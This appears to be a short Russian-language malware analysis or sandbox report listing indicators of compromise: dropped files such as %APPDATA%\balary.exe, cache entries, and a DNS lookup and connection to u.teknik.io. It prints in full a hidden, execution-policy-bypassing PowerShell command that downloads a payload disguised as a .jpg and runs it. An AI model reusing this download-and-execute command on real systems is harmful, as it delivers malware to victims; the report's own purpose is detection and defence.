Техническая информация
- https://u.teknik.io/cmzy2.jpg как %appdata%\balary.exe
- %TEMP%\abctfhghghghghœ.sct
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %APPDATA%\balary.exe
- 'u.##knik.io':443
- DNS ASK u.##knik.io
- '%APPDATA%\balary.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://u.teknik.io/cMZy2.jpg','%APPDATA%\balary.exe');Start-Process '%APPDAT...' (со скрытым окном)